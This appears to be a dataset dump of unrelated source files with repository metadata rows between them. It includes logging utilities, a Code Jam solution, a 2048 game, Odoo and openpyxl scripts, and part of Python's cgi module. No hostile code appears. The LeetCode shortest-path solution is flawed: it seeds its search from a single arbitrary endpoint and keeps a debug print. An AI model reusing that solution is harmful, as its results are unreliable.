elif hasattr(obj, 'union'):
encoded = tuple(obj)
elif set(['next', 'union', '__iter__']).intersection(dir(obj)):
encoded = list(obj)
else:
encoded = str(obj)
return encoded
class StructuredMessage(object):
"""Converts a message and kwargs to a json string
Attributes:
kwargs (dict): Keyword arguments passed to
:class:`~pygogo.utils.CustomEncoder`.
Args:
message (string): The message to log.
kwargs (dict): Keyword arguments passed to
:class:`~pygogo.utils.CustomEncoder`.
Returns:
New instance of :class:`StructuredMessage`
See also:
:class:`pygogo.utils.StructuredAdapter`
Examples:
>>> from json import loads
>>> msg = StructuredMessage('hello world', key='value')
>>> loads(str(msg)) == {'message': 'hello world', 'key': 'value'}
True
"""
def __init__(self, message=None, **kwargs):
"""Initialization method.
Args:
message (string): The message to log.
kwargs (dict): Keyword arguments passed to
:class:`~pygogo.utils.CustomEncoder`.
Returns:
New instance of :class:`StructuredMessage`
Examples:
>>> StructuredMessage('message') # doctest: +ELLIPSIS
<pygogo.utils.StructuredMessage object at 0x...>
"""
kwargs['message'] = message
self.kwargs = kwargs
def __str__(self):
""" String method
Returns:
str: The encoded object
Examples
>>> from json import loads
>>> msg = str(StructuredMessage('hello world', key='value'))
>>> loads(msg) == {'message': 'hello world', 'key': 'value'}
True
"""
return str(CustomEncoder().encode(self.kwargs))
class StructuredAdapter(logging.LoggerAdapter):
"""A logging adapter that creates a json string from a log message and the
`extra` kwarg
See also:
:class:`pygogo.utils.StructuredMessage`
:meth:`pygogo.Gogo.get_structured_logger`
Examples:
>>> from io import StringIO
>>> from json import loads
>>> s = StringIO()
>>> logger = logging.getLogger()
>>> hdlr = logging.StreamHandler(s)
>>> logger.addHandler(hdlr)
>>> structured_logger = StructuredAdapter(logger, {'all': True})
>>> structured_logger.debug('hello', extra={'key': u'value'})
>>> loads(s.getvalue()) == {
... 'all': True, 'message': 'hello', 'key': 'value'}
True
"""
def process(self, msg, kwargs):
""" Modifies the message and/or keyword arguments passed to a logging
call in order to insert contextual information.
Args:
msg (str): The message to log.
kwargs (dict):
Returns:
Tuple of (:class:`~pygogo.utils.StructuredMessage`, modified kwargs)
Examples:
>>> from json import loads
>>> logger = logging.getLogger()
>>> structured_logger = StructuredAdapter(logger, {'all': True})
>>> extra = {'key': 'value'}
>>> m, k = structured_logger.process('message', {'extra': extra})
>>> loads(m) == {'all': True, 'message': 'message', 'key': 'value'}
True
>>> k == {'extra': {'all': True, 'key': 'value'}}
True
"""
extra = kwargs.get('extra', {})
extra.update(self.extra)
kwargs['extra'] = extra
return str(StructuredMessage(msg, **extra)), kwargs
class LogFilter(logging.Filter):
"""Filters log messages depending on level
Attributes:
level (int): The logging level.
+-------------------------+-------+
| logging level attribute | value |
+=========================+=======+
| CRITICAL | 50 |
+-------------------------+-------+
| ERROR | 40 |
+-------------------------+-------+
| WARNING | 30 |
+-------------------------+-------+
| INFO | 20 |
+-------------------------+-------+
| DEBUG | 10 |
+-------------------------+-------+
| NOTSET | 0 |
+-------------------------+-------+
Args:
level (int): The logging level.
Returns:
New instance of :class:`LogFilter`
See also:
:meth:`pygogo.Gogo.update_hdlr`
"""
def __init__(self, level):
"""Initialization method.
Args:
level (int): The logging level.
Returns:
New instance of :class:`LogFilter`
Examples:
>>> LogFilter(40) # doctest: +ELLIPSIS
<pygogo.utils.LogFilter object at 0x...>
"""
self.high_level = level
def filter(self, record):
"""Determines whether or a not a message should be logged.
Args:
record (obj): The event to (potentially) log
Returns:
bool: True if the event level is lower than self.high_level
Examples:
>>> attrs = {'levelno': logging.INFO}
>>> record = logging.makeLogRecord(attrs)
>>> LogFilter(40).filter(record)
True
"""
return record.levelno < self.high_level
def get_structured_filter(name='', **kwargs):
"""Returns a structured filter that injects contextual information into
log records.
Args:
kwargs (dict): The contextual information you wish to inject
See also:
:meth:`pygogo.Gogo.update_hdlr`
Returns:
New instance of :class:`pygogo.utils.StructuredFilter`
Examples:
>>> structured_filter = get_structured_filter(user='fred')
>>> structured_filter # doctest: +ELLIPSIS
<pygogo.utils...StructuredFilter object at 0x...>
>>>
>>> logger = logging.getLogger('structured_filter')
>>> hdlr = logging.StreamHandler(sys.stdout)
>>> formatter = logging.Formatter('User %(user)s said, "%(message)s".')
>>> hdlr.setFormatter(formatter)
>>> logger.addFilter(structured_filter)
>>> logger.addHandler(hdlr)
>>> logger.debug('A debug message')
User fred said, "A debug message".
"""
class StructuredFilter(logging.Filter):
"""
Injects contextual information into log records.
"""
def filter(self, record):
"""Adds contextual information to a log record
Args:
record (obj): The event to contextualize
Returns:
bool: True
"""
for k, v in kwargs.items():
setattr(record, k, v)
return True
return StructuredFilter(name)
| [
"[email protected]"
] | |
a47f8034e2370aec414aa1e5b290f1bff3f65fe2 | 6b2a8dd202fdce77c971c412717e305e1caaac51 | /solutions_2700486_0/Python/jbaek/codejam3.py | 66cc08fb16dc343fe03e3fc66bf66e11429e006d | [] | no_license | alexandraback/datacollection | 0bc67a9ace00abbc843f4912562f3a064992e0e9 | 076a7bc7693f3abf07bfdbdac838cb4ef65ccfcf | refs/heads/master | 2021-01-24T18:27:24.417992 | 2017-05-23T09:23:38 | 2017-05-23T09:23:38 | 84,313,442 | 2 | 4 | null | null | null | null | UTF-8 | Python | false | false | 2,392 | py | from math import *
from itertools import *
import os
from decimal import *
ALLGRIDS = []
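# brute-force enumeration: build every possible final pile of diamonds, then report the fraction of piles in which the cell at (x, y) is covered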
def main():
global ALLGRIDS
f = open("/home/jackie/Documents/Codejam/in")
lines = f.readlines()
cases = int(lines.pop(0))
for i in range(cases):
ALLGRIDS = []
print "Case #%d:" % (i+1),
guide = split_to_int(lines)
number = guide[0]
x = guide[1]
y = guide[2]
diamonds = []
grid = {}
if x == 0 and y == 0:
print "1.0"
continue
ALLGRIDS.append(grid)
do_problem(number, diamonds)
total = len(ALLGRIDS)
win = 0
for grid in ALLGRIDS:
if x in grid and grid[x] >= y+1:
win += 1
answer = str(Decimal(win)/Decimal(total))
if "." not in answer:
answer += ".0"
print answer
def do_problem(number,diamonds):
global ALLGRIDS
for i in range(number):
for j in range(len(ALLGRIDS)):
helper(ALLGRIDS[j], 0)
# drops one diamond
def helper(grid, pos):
global ALLGRIDS
if pos not in grid:
grid[pos]=0
highest = grid[pos]
if blockedleft(grid, pos):
if blockedright(grid,pos):
grid[pos]+=2
return
else:
helper(grid, pos+1)
return
elif blockedright(grid,pos):
helper(grid, pos-1)
return
# go on ground
elif highest == 0:
grid[pos]=1
return
else:
# right
newgrid = grid.copy()
ALLGRIDS.append(newgrid)
helper(newgrid, pos+1)
# left
helper(grid, pos-1)
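# a neighbouring column blocks a sliding diamond when its stack is already taller than the current column's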
def blockedleft(grid, pos):
return pos-1 in grid and grid[pos-1]>grid[pos]
def blockedright(grid, pos):
return pos+1 in grid and grid[pos+1]>grid[pos]
# general helper functions
def split_to_int(lines):
return [int(v) for v in lines.pop(0).split()]
def factors(n):
return set(reduce(list.__add__,
([i, n//i] for i in range(1, int(n**0.5) + 1) if n % i == 0)))
def isPrime(n):
if n == 2 or n == 3: return True
if n < 2 or n%2 == 0: return False
if n < 9: return True
if n%3 == 0: return False
r = int(n**0.5)
f = 5
while f <= r:
if n%f == 0: return False
if n%(f+2) == 0: return False
f +=6
return True
g = {0:1, 2:1}
#helper(g, 0)
#print ALLGRIDS
main()
| [
"[email protected]"
] | |
ee9a241f9d288ae78366ae06757b0dee588ce874 | 5acc77c4d594c1750a9b7477499ee25b4c307bca | /ehpi_action_recognition/train_ehpi.py | 3c8f3b90123e199bd9a2df7439bbf06c510462ca | [
"MIT"
] | permissive | noboevbo/ehpi_action_recognition | bc15a3c260c79b85a82844a2779c9b1ec9cf42fd | 3b77eeb5103f0f11c8d4be993ec79dddad7e661c | refs/heads/master | 2021-12-29T05:24:31.891044 | 2021-12-19T16:23:36 | 2021-12-19T16:23:36 | 180,351,212 | 113 | 23 | null | 2019-04-23T11:24:27 | 2019-04-09T11:22:45 | Python | UTF-8 | Python | false | false | 3,006 | py | import os
import random
from typing import List
import torch
from ehpi_action_recognition.config import ehpi_dataset_path
from nobos_commons.data_structures.constants.dataset_part import DatasetPart
from nobos_commons.data_structures.dimension import ImageSize
from nobos_torch_lib.configs.training_configs.training_config_base import TrainingConfigBase
from nobos_torch_lib.datasets.action_recognition_datasets.ehpi_dataset import EhpiDataset, RemoveJointsOutsideImgEhpi, \
ScaleEhpi, TranslateEhpi, FlipEhpi, NormalizeEhpi
from nobos_torch_lib.datasets.samplers.imbalanced_dataset_sampler import ImbalancedDatasetSampler
from nobos_torch_lib.models.detection_models.shufflenet_v2 import ShuffleNetV2
from torch.utils.data import ConcatDataset, DataLoader
from torchvision.transforms import transforms
from ehpi_action_recognition.trainer_ehpi import TrainerEhpi
foot_indexes: List[int] = [11, 14]
knee_indexes: List[int] = [10, 13]
def get_train_set(dataset_path: str, image_size: ImageSize):
num_joints = 15
left_indexes: List[int] = [3, 4, 5, 9, 10, 11]
right_indexes: List[int] = [6, 7, 8, 12, 13, 14]
datasets: List[EhpiDataset] = [
# Set 1
EhpiDataset(os.path.join(dataset_path, "ofp_record_2019_03_11_HSRT_30FPS"),
transform=transforms.Compose([
RemoveJointsOutsideImgEhpi(image_size),
ScaleEhpi(image_size),
TranslateEhpi(image_size),
FlipEhpi(left_indexes=left_indexes, right_indexes=right_indexes),
NormalizeEhpi(image_size)
]), num_joints=num_joints, dataset_part=DatasetPart.TEST),
# Set 2
EhpiDataset(os.path.join(dataset_path, "2019_03_13_Freilichtmuseum_30FPS"),
transform=transforms.Compose([
RemoveJointsOutsideImgEhpi(image_size),
ScaleEhpi(image_size),
TranslateEhpi(image_size),
FlipEhpi(left_indexes=left_indexes, right_indexes=right_indexes),
NormalizeEhpi(image_size)
]), num_joints=num_joints, dataset_part=DatasetPart.TRAIN),
]
for dataset in datasets:
dataset.print_label_statistics()
return ConcatDataset(datasets)
if __name__ == '__main__':
batch_size = 128
seed = 0
random.seed(seed)
torch.manual_seed(seed)
torch.cuda.manual_seed_all(seed)
# Train set
train_set = get_train_set(ehpi_dataset_path, image_size=ImageSize(1280, 720))
sampler = ImbalancedDatasetSampler(train_set, dataset_type=EhpiDataset)
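    # oversample under-represented action classes so each training batch is roughly class-balanced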
train_loader = DataLoader(train_set, batch_size=batch_size, sampler=sampler, num_workers=1)
# config
train_config = TrainingConfigBase("ehpi_model", "models")
train_config.weight_decay = 0
train_config.num_epochs = 140
trainer = TrainerEhpi()
trainer.train(train_loader, train_config, model=ShuffleNetV2(3))
| [
"[email protected]"
] | |
49df46b47998c18b9a1e1cd63e336461b0b668e5 | 5390d79dad71ad0d9ff9d0777435dcaf4aad16b3 | /chapter_05/toppings5.py | bb3053276c058e6ce16e156ef1659461aab3c552 | [] | no_license | JasperMi/python_learning | 19770d79cce900d968cec76dac11e45a3df9c34c | 8111d0d12e4608484864dddb597522c6c60b54e8 | refs/heads/master | 2020-11-26T08:57:02.983869 | 2020-03-11T10:14:55 | 2020-03-11T10:14:55 | 218,935,548 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 247 | py | requested_toppings = []
if requested_toppings:
for requested_topping in requested_toppings:
print("Adding " + requested_topping + ".")
print("\nFinished making your pizza!")
else:
print("Are you sure you want a plain pizza?")
| [
"[email protected]"
] | |
193cb91ce7cabc2daeb6898364f78bd9d496cf4b | 9fc6604ae98e1ae91c490e8201364fdee1b4222a | /eg_delivery_return_disclaimer_msg/wizards/msg_by_unifonic.py | 1e5e3eb6e45160c46c0dadf6f1a4942c11dc796a | [] | no_license | nabiforks/baytonia | b65e6a7e1c7f52a7243e82f5fbcc62ae4cbe93c4 | 58cb304d105bb7332f0a6ab685015f070988ba56 | refs/heads/main | 2023-03-23T21:02:57.862331 | 2021-01-04T03:40:58 | 2021-01-04T03:40:58 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,566 | py | from odoo import models, fields, api
from odoo.exceptions import Warning
class MsgByUnifonic(models.TransientModel):
_name = "msg.by.unifonic"
number = fields.Char(string="Number")
message = fields.Text(string="Message")
@api.model
def default_get(self, fields_list):
res = super(MsgByUnifonic, self).default_get(fields_list)
picking_id = self.env["stock.picking"].browse(self._context.get("active_id"))
sms_instance_id = self.env["sms.instance"].search([("provider", "=", "unifonic_sms")], limit=1)
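        # build the return-disclaimer SMS by filling the template placeholders with details of the selected picking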
if picking_id and sms_instance_id:
message = sms_instance_id.return_disclaimer_msg
dst_number = picking_id.partner_id.phone or picking_id.partner_id.mobile or None
if message:
url = "https://oddo.baytonia.com/delivery_return/confirm/{}".format(picking_id.id)
message = message.replace("{{order_number}}", picking_id.name)
message = message.replace("{{customer_name}}", picking_id.partner_id.name)
message = message.replace("{{total_amount}}", str(picking_id.total_amount))
message = message.replace("{{return_approve_url}}", url)
res["number"] = dst_number
res["message"] = message
return res
@api.multi
def send_msg_customer_by_unifonic(self):
if self.message and self.number:
self.env["post.sms.wizard"].send_sms(body=self.message, dst_number=self.number)
else:
raise Warning("Number and Message are required")
| [
"[email protected]"
] | |
7f733621867abbd79a0a8d2784f7d57814b625e5 | ebd24e400986c57b4bb1b9578ebd8807a6db62e8 | /InstaGrade-FormBuilder/xlsxwriter/test/comparison/test_chart_errorbars05.py | 002e0d8055c1d99983bc226195274cbf4b92c183 | [] | no_license | nate-parrott/ig | 6abed952bf32119a536a524422037ede9b431926 | 6e0b6ac0fb4b59846680567150ce69a620e7f15d | refs/heads/master | 2021-01-12T10:15:15.825004 | 2016-12-13T21:23:17 | 2016-12-13T21:23:17 | 76,399,529 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,706 | py | ###############################################################################
#
# Tests for XlsxWriter.
#
# Copyright (c), 2013-2014, John McNamara, [email protected]
#
from ..excel_comparsion_test import ExcelComparisonTest
from ...workbook import Workbook
class TestCompareXLSXFiles(ExcelComparisonTest):
"""
Test file created by XlsxWriter against a file created by Excel.
"""
def setUp(self):
self.maxDiff = None
filename = 'chart_errorbars05.xlsx'
test_dir = 'xlsxwriter/test/comparison/'
self.got_filename = test_dir + '_test_' + filename
self.exp_filename = test_dir + 'xlsx_files/' + filename
self.ignore_files = []
self.ignore_elements = {}
def test_create_file(self):
"""Test the creation of an XlsxWriter file with error bars."""
workbook = Workbook(self.got_filename)
worksheet = workbook.add_worksheet()
chart = workbook.add_chart({'type': 'bar'})
chart.axis_ids = [49016832, 49019136]
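        # pin the axis ids so the generated chart XML matches the Excel-created reference file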
data = [
[1, 2, 3, 4, 5],
[2, 4, 6, 8, 10],
[3, 6, 9, 12, 15],
]
worksheet.write_column('A1', data[0])
worksheet.write_column('B1', data[1])
worksheet.write_column('C1', data[2])
chart.add_series({
'categories': '=Sheet1!$A$1:$A$5',
'values': '=Sheet1!$B$1:$B$5',
'x_error_bars': {'type': 'standard_error'},
})
chart.add_series({
'categories': '=Sheet1!$A$1:$A$5',
'values': '=Sheet1!$C$1:$C$5',
})
worksheet.insert_chart('E9', chart)
workbook.close()
self.assertExcelEqual()
| [
"[email protected]"
] | |
5ad138fa284a69c9c985ba8a2084ea57d9d8d176 | 0071aad01ab5e91b7d32567470bd729c23bac656 | /g2048.py | d75f388736b07dd7f87d31f67252e7ab02cbf060 | [] | no_license | Hakuyume/2048-rl | 19c29e24492bd1efaddbbe0dad28474752b2d97f | ff0593582b293bcf1c21bd2e26701da6d24c6647 | refs/heads/master | 2021-01-22T18:33:36.057004 | 2017-08-26T06:47:37 | 2017-08-26T06:47:37 | 100,769,933 | 1 | 2 | null | null | null | null | UTF-8 | Python | false | false | 2,058 | py | import numpy as np
import random
class G2048(object):
def __init__(self, size=4):
self.size = size
self.board = np.empty((size, size), dtype=np.uint8)
def reset(self):
self.score = 0
self.board[:] = 0
for _ in range(2):
self._add()
@property
def movability(self):
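        # one flag per direction: True when sliding the board that way would move or merge at least one tile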
m = np.zeros(4, dtype=bool)
for d in range(4):
board = np.rot90(self.board, d)
if np.logical_and(board[:, :-1] == 0, board[:, 1:] > 0).any():
m[d] = True
elif np.logical_and(
board[:, :-1] > 0, board[:, :-1] == board[:, 1:]).any():
m[d] = True
return m
@property
def is_finished(self):
return not self.movability.any()
def _add(self):
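        # place a tile in a random empty cell: exponent 1 (a "2" tile) with probability 3/4, exponent 2 (a "4" tile) otherwise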
blank = tuple(zip(*np.where(self.board == 0)))
if len(blank) > 0:
u, v = random.choice(blank)
if random.uniform(0, 1) > 1 / 4:
self.board[u, v] = 1
else:
self.board[u, v] = 2
def move(self, direction):
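        # slide and merge every row of the rotated board, add merged tile values to the score, and spawn a new tile if anything changed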
change = False
for line in np.rot90(self.board, direction):
v, w = 0, 0
new_line = np.zeros_like(line)
while v < self.size:
if line[v] == 0:
v += 1
elif new_line[w] == line[v]:
new_line[w] += 1
self.score += 1 << new_line[w]
change = True
v += 1
w += 1
elif new_line[w] == 0:
new_line[w] = line[v]
change = change or not v == w
v += 1
else:
w += 1
line[:] = new_line
if change:
self._add()
def normalize(self):
self.board[:] = min(
(np.rot90(b, r)
for b in (self.board, self.board.transpose())
for r in range(4)),
key=lambda b: tuple(b.flatten()))
| [
"[email protected]"
] | |
8ee0c7c66379fbead56732ab779d72356e965329 | 925f199438b3af508cf083ce094cb6a5f208fed8 | /src/lt_847.py | ed54216792f6792912f298fe087f8840d98ee563 | [] | no_license | oxhead/CodingYourWay | b1b50236cdfb06669c123fd9202ce3d87304a3bf | e60ba45fe2f2e5e3b3abfecec3db76f5ce1fde59 | refs/heads/master | 2020-08-06T16:45:21.054650 | 2018-06-26T03:53:38 | 2018-06-26T03:53:38 | 30,577,969 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,323 | py | """
https://leetcode.com/contest/weekly-contest-87/problems/shortest-path-visiting-all-nodes/
"""
"""
An undirected, connected graph of N nodes (labeled 0, 1, 2, ..., N-1) is given as graph.
graph.length = N, and j != i is in the list graph[i] exactly once, if and only if nodes i and j are connected.
Return the length of the shortest path that visits every node. You may start and stop at any node, you may revisit nodes multiple times, and you may reuse edges.
Example 1:
Input: [[1,2,3],[0],[0],[0]]
Output: 4
Explanation: One possible path is [1,0,2,0,3]
Example 2:
Input: [[1],[0,2,4],[1,3,4],[2],[1,2]]
Output: 4
Explanation: One possible path is [0,1,4,2,3]
Note:
1 <= graph.length <= 12
0 <= graph[i].length < graph.length
"""
class Solution:
def shortestPathLength(self, graph):
"""
:type graph: List[List[int]]
:rtype: int
"""
def traverse(queue):
while queue:
current_node, visited, current_length = queue.pop(0)
if len(visited) == len(graph):
return current_length
for neighbor in graph[current_node]:
queue.append((neighbor, visited | set([neighbor]), current_length + 1))
num_edges = float('inf')
endpoints = []
for node_id in range(len(graph)):
node_edges = graph[node_id]
if len(node_edges) < num_edges:
endpoints = [node_id]
num_edges = len(node_edges)
elif len(node_edges) == num_edges:
endpoints.append(node_id)
queue = []
print(endpoints)
for node_id in endpoints[1:2]:
queue.append((node_id, set([node_id]), 0))
return traverse([x for x in queue])
if __name__ == '__main__':
test_cases = [
#([[1,2,3],[0],[0],[0]], 4),
#([[1],[0,2,4],[1,3,4],[2],[1,2]], 4),
#([[1],[0,2],[1,3],[2],[1,5],[4]], 6),
#([[1],[0,2,6],[1,3],[2],[5],[4,6],[1,5,7],[6]], 9),
([[1,4,6,8,9],[0,6],[9],[5],[0],[7,3],[0,1],[9,5],[0],[0,2,7]], 10),
]
for test_case in test_cases:
print('case:', test_case)
output = Solution().shortestPathLength(test_case[0])
print('output:', output)
assert output == test_case[1]
| [
"[email protected]"
] | |
a2d189784bb2a282ec8d7cdf005a0c8612dceb9b | bd08d0532f20b7285b437c9bf620de1bbcd5b9ea | /aalh_iit_buildings_006/populate-iso8601-amerdate.py | 08c1fdd9ca6bdcee638e2292f3d12d555f36c6ff | [
"Unlicense"
] | permissive | johndewees/iitmigration | a9e8a31ba6ceb541ce12c22fd612596cc243dbca | 4dadfbecda719d6e7d60af076a231aedec3c862f | refs/heads/main | 2023-03-14T17:06:58.777683 | 2021-03-27T20:44:58 | 2021-03-27T20:44:58 | 320,086,321 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,719 | py | from openpyxl import load_workbook
import re
filename = 'aalh_iit_buildings_006.xlsx'
wb = load_workbook(filename)
ws = wb['Metadata Template']
minimumcol = 15
maximumcol = 15
minimumrow = 7
maximumrow = 515
iterationrow = 7
targetcol = 15
isostandardcol = 16
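# walk the date column row by row: cells holding M/D/YYYY are rewritten in place as ISO 8601, while "Month D, YYYY" dates are written as ISO 8601 into the next column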
for row in ws.iter_rows(min_row=minimumrow, min_col=minimumcol, max_row=maximumrow, max_col=maximumcol):
print(iterationrow)
print(ws.cell(row=iterationrow, column=targetcol).value)
try:
for cell in row:
ameryear = None
yearraw = ws.cell(row=iterationrow, column=targetcol).value
if yearraw.find(',') != -1:
ameryearre = re.findall('\d\d\d\d', yearraw)
ameryear = ameryearre[0]
print(ameryear)
else:
print('Not an American formatted date (year)')
for cell in row:
amermon = None
monraw = ws.cell(row=iterationrow, column=targetcol).value
if monraw.find(',') != -1:
                # map any English month abbreviation, regardless of case, to its two-digit number
                month_map = {'jan': '01', 'feb': '02', 'mar': '03', 'apr': '04',
                             'may': '05', 'jun': '06', 'jul': '07', 'aug': '08',
                             'sep': '09', 'oct': '10', 'nov': '11', 'dec': '12'}
                for abbrev, month_number in month_map.items():
                    if abbrev in monraw.lower():
                        amermon = month_number
                        break
print(amermon)
else:
print('Not an American formatted date (month)')
for cell in row:
amerday = None
dayraw = ws.cell(row=iterationrow, column=targetcol).value
if dayraw.find(',') != -1:
daypart1 = dayraw.split(',')
daypart2 = daypart1[0]
daypart3 = daypart2.split()
daypart4 = daypart3[1]
                if len(daypart4) == 2:
                    amerday = daypart4
                else:
                    amerday = '0' + daypart4
print(amerday)
else:
print('Not an American formatted date (day)')
for cell in row:
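            # cells already holding M/D/YYYY dates are rebuilt as zero-padded YYYY-MM-DD and written back in place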
testvar = ws.cell(row=iterationrow, column=targetcol).value
if testvar.find('/') != -1:
testvarlist = testvar.split('/')
testvaryear = testvarlist[2]
testvaryear = testvaryear.strip()
testvarmonth = testvarlist[0]
testvarmonth = testvarmonth.strip()
testvarmonth = int(testvarmonth)
if testvarmonth < 10:
testvarmonth = str(testvarmonth)
testvarmonth = '0' + testvarmonth
else:
testvarmonth = str(testvarmonth)
testvarday = testvarlist[1]
testvarday = testvarday.strip()
testvarday = int(testvarday)
if testvarday < 10:
testvarday = str(testvarday)
testvarday = '0' + testvarday
else:
testvarday = str(testvarday)
isodate = testvaryear + '-' + testvarmonth + '-' + testvarday
ws.cell(row=iterationrow, column=targetcol).value = isodate
#print(isodate)
else:
print ('Not a date formatted with a slash')
for cell in row:
if ameryear == None:
print('Not an American formatted date at all')
else:
amerdatetrans = ameryear + '-' + amermon + '-' + amerday
ws.cell(row=iterationrow, column=isostandardcol).value = amerdatetrans
print(amerdatetrans)
except:
print('Not an American formatted date at all')
iterationrow = iterationrow + 1
wb.save('aalh_iit_buildings_006.xlsx') | [
"[email protected]"
] | |
0c2f558ec0494841857978e64f4fd0e8c8937538 | 045cb1a5638c3575296f83471758dc09a8065725 | /addons/hr_recruitment/__init__.py | 2283b78b5f3c81ef2cc3a1d49ecbbb3c7b0b0f21 | [] | no_license | marionumza/saas | 7236842b0db98d1a0d0c3c88df32d268509629cb | 148dd95d991a348ebbaff9396759a7dd1fe6e101 | refs/heads/main | 2023-03-27T14:08:57.121601 | 2021-03-20T07:59:08 | 2021-03-20T07:59:08 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 126 | py | # -*- encoding: utf-8 -*-
# Part of Harpiya. See LICENSE file for full copyright and licensing details.
from . import models
| [
"[email protected]"
] | |
5d46d3160485153a72aeaa43b0d98d716859314c | 5cdd13489c995d825985f8e76fb9641d83675972 | /PlotConfiguration/ISR/2016/fake_estimation/muon/LLSS/cuts.py | 313c13d35f546643f1eed5f28fcb69008150737b | [] | no_license | CMSSNU/MultiUniv | d506cea55b1f57e0694309e04b9584434c859917 | cb72ac8cba215598a0f09a46725123e071f9137f | refs/heads/master | 2020-04-20T06:23:13.425043 | 2020-03-25T08:11:31 | 2020-03-25T08:11:31 | 168,682,069 | 0 | 4 | null | 2020-02-13T10:14:48 | 2019-02-01T10:35:47 | Python | UTF-8 | Python | false | false | 509 | py | from CommonPyTools.python.CommonTools import *
SKFlat_WD = os.getenv('SKFlat_WD')
sys.path.insert(0,SKFlat_WD+'/CommonTools/include')
from Definitions import *
supercut = '1==1'
# for fake estimation
# LL same sign
cuts['detector_level'] = 'is_dimu_tri_passed == 1 && evt_tag_dimuon_rec_Fake == 1 && evt_tag_dielectron_rec_Fake == 0 && evt_tag_analysisevnt_sel_rec_Fake == 1 && dilep_pt_rec_Fake < 100. && dilep_mass_rec_Fake > 40 && evt_tag_oppositecharge_sel_rec_Fake == 0 && evt_tag_LL_rec_Fake == 1 '
| [
"[email protected]"
] | |
f9c2f40f505b378f8301758253f7362e714120e9 | 4ff5ca8f95e6014fa76323a69f3fbcb91ae8db1f | /usr/lib/python3.8/cgi.py | e41e56e0987fdb28510766b99564fb42e1ee50f8 | [
"Python-2.0"
] | permissive | Nasera5222/git-sdk-32 | ad1ccd631958d1cdbc6f6c9d06793342d5c566ce | bcff70f916ec1f028f79036d5b913a7279fea0e5 | refs/heads/main | 2023-06-01T09:05:05.990441 | 2021-06-20T03:07:00 | 2021-06-20T03:07:00 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 33,548 | py | #!/usr/bin/python
# NOTE: the above "/usr/local/bin/python" is NOT a mistake. It is
# intentionally NOT "/usr/bin/env python". On many systems
# (e.g. Solaris), /usr/local/bin is not in $PATH as passed to CGI
# scripts, and /usr/local/bin is the default directory where Python is
# installed, so /usr/bin/env would be unable to find python. Granted,
# binary installations by Linux vendors often install Python in
# /usr/bin. So let those vendors patch cgi.py to match their choice
# of installation.
"""Support module for CGI (Common Gateway Interface) scripts.
This module defines a number of utilities for use by CGI scripts
written in Python.
"""
# History
# -------
#
# Michael McLay started this module. Steve Majewski changed the
# interface to SvFormContentDict and FormContentDict. The multipart
# parsing was inspired by code submitted by Andreas Paepcke. Guido van
# Rossum rewrote, reformatted and documented the module and is currently
# responsible for its maintenance.
#
__version__ = "2.6"
# Imports
# =======
from io import StringIO, BytesIO, TextIOWrapper
from collections.abc import Mapping
import sys
import os
import urllib.parse
from email.parser import FeedParser
from email.message import Message
import html
import locale
import tempfile
__all__ = ["MiniFieldStorage", "FieldStorage", "parse", "parse_multipart",
"parse_header", "test", "print_exception", "print_environ",
"print_form", "print_directory", "print_arguments",
"print_environ_usage"]
# Logging support
# ===============
logfile = "" # Filename to log to, if not empty
logfp = None # File object to log to, if not None
def initlog(*allargs):
"""Write a log message, if there is a log file.
Even though this function is called initlog(), you should always
use log(); log is a variable that is set either to initlog
(initially), to dolog (once the log file has been opened), or to
nolog (when logging is disabled).
The first argument is a format string; the remaining arguments (if
any) are arguments to the % operator, so e.g.
log("%s: %s", "a", "b")
will write "a: b" to the log file, followed by a newline.
If the global logfp is not None, it should be a file object to
which log data is written.
If the global logfp is None, the global logfile may be a string
giving a filename to open, in append mode. This file should be
world writable!!! If the file can't be opened, logging is
silently disabled (since there is no safe place where we could
send an error message).
"""
global log, logfile, logfp
if logfile and not logfp:
try:
logfp = open(logfile, "a")
except OSError:
pass
if not logfp:
log = nolog
else:
log = dolog
log(*allargs)
def dolog(fmt, *args):
"""Write a log message to the log file. See initlog() for docs."""
logfp.write(fmt%args + "\n")
def nolog(*allargs):
"""Dummy function, assigned to log when logging is disabled."""
pass
def closelog():
"""Close the log file."""
global log, logfile, logfp
logfile = ''
if logfp:
logfp.close()
logfp = None
log = initlog
log = initlog # The current logging function
# Parsing functions
# =================
# Maximum input we will accept when REQUEST_METHOD is POST
# 0 ==> unlimited input
maxlen = 0
def parse(fp=None, environ=os.environ, keep_blank_values=0, strict_parsing=0):
"""Parse a query in the environment or from a file (default stdin)
Arguments, all optional:
fp : file pointer; default: sys.stdin.buffer
environ : environment dictionary; default: os.environ
keep_blank_values: flag indicating whether blank values in
percent-encoded forms should be treated as blank strings.
A true value indicates that blanks should be retained as
blank strings. The default false value indicates that
blank values are to be ignored and treated as if they were
not included.
strict_parsing: flag indicating what to do with parsing errors.
If false (the default), errors are silently ignored.
If true, errors raise a ValueError exception.
"""
if fp is None:
fp = sys.stdin
# field keys and values (except for files) are returned as strings
# an encoding is required to decode the bytes read from self.fp
if hasattr(fp,'encoding'):
encoding = fp.encoding
else:
encoding = 'latin-1'
# fp.read() must return bytes
if isinstance(fp, TextIOWrapper):
fp = fp.buffer
if not 'REQUEST_METHOD' in environ:
environ['REQUEST_METHOD'] = 'GET' # For testing stand-alone
if environ['REQUEST_METHOD'] == 'POST':
ctype, pdict = parse_header(environ['CONTENT_TYPE'])
if ctype == 'multipart/form-data':
return parse_multipart(fp, pdict)
elif ctype == 'application/x-www-form-urlencoded':
clength = int(environ['CONTENT_LENGTH'])
if maxlen and clength > maxlen:
raise ValueError('Maximum content length exceeded')
qs = fp.read(clength).decode(encoding)
else:
qs = '' # Unknown content-type
if 'QUERY_STRING' in environ:
if qs: qs = qs + '&'
qs = qs + environ['QUERY_STRING']
elif sys.argv[1:]:
if qs: qs = qs + '&'
qs = qs + sys.argv[1]
environ['QUERY_STRING'] = qs # XXX Shouldn't, really
elif 'QUERY_STRING' in environ:
qs = environ['QUERY_STRING']
else:
if sys.argv[1:]:
qs = sys.argv[1]
else:
qs = ""
environ['QUERY_STRING'] = qs # XXX Shouldn't, really
return urllib.parse.parse_qs(qs, keep_blank_values, strict_parsing,
encoding=encoding)
def parse_multipart(fp, pdict, encoding="utf-8", errors="replace"):
"""Parse multipart input.
Arguments:
fp : input file
pdict: dictionary containing other parameters of content-type header
